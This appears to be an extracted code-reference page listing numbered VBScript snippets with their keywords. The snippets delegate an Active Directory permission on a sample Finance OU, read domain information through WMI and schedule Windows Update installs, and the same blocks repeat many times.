    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    1706

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    1708

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    1709

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    1710

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    1712

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    1714

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    1715

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    1716

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    1717

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    1718

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    1719

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    1720

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    1721

    objDacl.AddAce objAce

    AddAce

    1723

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    1725

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)

    Put

    Array

    1726

    objSDUtil.SetInfo

    SetInfo

    1734

    On Error Resume Next

    1736

    strComputer = "."

    1737

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    1740

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    1743

    For Each objItem in colItems

    1744

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    1745

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    1746

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    1747

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    1748

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    1749

    Wscript.Echo

    Echo

    1750

    Next

    1754

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    1755

    Set objSettings = objAutoUpdate.Settings

    Settings

    1757

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    1758

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    1760

    objSettings.Save

    Save

    1767

    On Error Resume Next

    1769

    strComputer = "."

    1770

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    1773

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    1775

    For Each objItem in colItems

    1776

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    1777

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    1778

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    1779

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    1780

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    1782

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    1784

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    1785

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    1786

    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    1787

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    1788

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    1789

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    1790

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    1791

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    1792

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    1794

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    1796

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    1797

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    1798

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    1799

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    1800

    Wscript.Echo

    Echo

    1801

    Next

    1807

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    1808

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    1809

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    1810

    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    1811

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    1813

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    1814

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    1815

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    1817

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    1819

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    1820

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    1821

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    1822

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    1823

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    1824

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    1825

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    1826

    objDacl.AddAce objAce

    AddAce

    1828

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    1830

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)

    Put

    Array

    1831

    objSDUtil.SetInfo

    SetInfo

    1839

    On Error Resume Next

    1841

    strComputer = "."

    1842

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    1845

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    1848

    For Each objItem in colItems

    1849

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    1850

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    1851

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    1852

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    1853

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    1854

    Wscript.Echo

    Echo

    1855

    Next

    1859

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    1860

    Set objSettings = objAutoUpdate.Settings

    Settings

    1862

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    1863

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    1865

    objSettings.Save

    Save

    1872

    On Error Resume Next

    1874

    strComputer = "."

    1875

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    1878

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    1880

    For Each objItem in colItems

    1881

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    1882

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    1883

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    1884

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    1885

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    1887

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    1889

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    1890

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    1891

    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    1892

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    1893

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    1894

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    1895

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    1896

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    1897

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    1899

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    1901

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    1902

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    1903

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    1904

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    1905

    Wscript.Echo

    Echo

    1906

    Next

    1912

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    1913

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    1914

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    1915

    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    1916

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    1918

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    1919

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    1920

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    1922

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    1924

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    1925

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    1926

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    1927

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    1928

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    1929

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    1930

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    1931

    objDacl.AddAce objAce

    AddAce

    1933

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    1935

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)

    Put

    Array

    1936

    objSDUtil.SetInfo

    SetInfo

    1944

    On Error Resume Next

    1946

    strComputer = "."

    1947

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    1950

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    1953

    For Each objItem in colItems

    1954

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    1955

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    1956

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    1957

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    1958

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    1959

    Wscript.Echo

    Echo

    1960

    Next

    1964

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    1965

    Set objSettings = objAutoUpdate.Settings

    Settings

    1967

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    1968

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    1970

    objSettings.Save

    Save

    1977

    On Error Resume Next

    1979

    strComputer = "."

    1980

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    1983

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    1985

    For Each objItem in colItems

    1986

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    1987

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    1988

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    1989

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    1990

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    1992

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    1994

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    1995

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    1996

    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    1997

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    1998

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    1999

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    2000

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    2001

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    2002

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    2004

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    2006

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    2007

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    2008

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    2009

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    2010

    Wscript.Echo

    Echo

    2011

    Next

    2017

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    2018

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    2019

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    2020

    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    2021

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    2023

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    2024

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    2025

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    2027

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    2029

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    2030

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    2031

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    2032

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    2033

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    2034

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    2035

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    2036

    objDacl.AddAce objAce

    AddAce

    2038

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    2040

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)

    Put

    Array

    2041

    objSDUtil.SetInfo

    SetInfo

    2049

    On Error Resume Next

    2051

    strComputer = "."

    2052

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    2055

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    2058

    For Each objItem in colItems

    2059

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    2060

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    2061

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    2062

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    2063

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    2064

    Wscript.Echo

    Echo

    2065

    Next

    2069

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    2070

    Set objSettings = objAutoUpdate.Settings

    Settings

    2072

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    2073

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    2075

    objSettings.Save

    Save

    2082

    On Error Resume Next

    2084

    strComputer = "."

    2085

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    2088

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    2090

    For Each objItem in colItems

    2091

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    2092

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    2093

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    2094

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    2095

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    2097

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    2099

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    2100

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    2101

    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    2102

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    2103

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    2104

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    2105

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    2106

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    2107

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    2109

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    2111

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    2112

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    2113

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    2114

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    2115

    Wscript.Echo

    Echo

    2116

    Next

    2122

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    2123

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    2124

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    2125

    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    2126

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    2128

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    2129

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    2130

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    2132

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    2134

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    2135

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    2136

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    2137

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    2138

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    2139

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    2140

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    2141

    objDacl.AddAce objAce

    AddAce

    2143

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    2145

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)

    Put

    Array

    2146

    objSDUtil.SetInfo

    SetInfo

    2154

    On Error Resume Next

    2156

    strComputer = "."

    2157

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    2160

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    2163

    For Each objItem in colItems

    2164

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    2165

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    2166

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    2167

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    2168

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    2169

    Wscript.Echo

    Echo

    2170

    Next

    2174

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    2175

    Set objSettings = objAutoUpdate.Settings

    Settings

    2177

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    2178

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    2180

    objSettings.Save

    Save

    2187

    On Error Resume Next

    2189

    strComputer = "."

    2190

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    2193

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    2195

    For Each objItem in colItems

    2196

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    2197

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    2198

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    2199

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    2200

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    2202

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    2204

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    2205

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    2206

    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    2207

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    2208

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    2209

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    2210

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    2211

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    2212

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    2214

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    2216

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    2217

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    2218

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    2219

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    2220

    Wscript.Echo

    Echo

    2221

    Next

    2228

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    2229

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    2230

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    2231

    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    2232

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    2234

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    2235

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    2236

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    2238

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    2240

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    2241

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    2242

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    2243

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    2244

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    2245

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    2246

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    2247

    objDacl.AddAce objAce

    AddAce

    2249

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    2251

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)

    Put

    Array

    2252

    objSDUtil.SetInfo

    SetInfo

    2260

    On Error Resume Next

    2262

    strComputer = "."

    2263

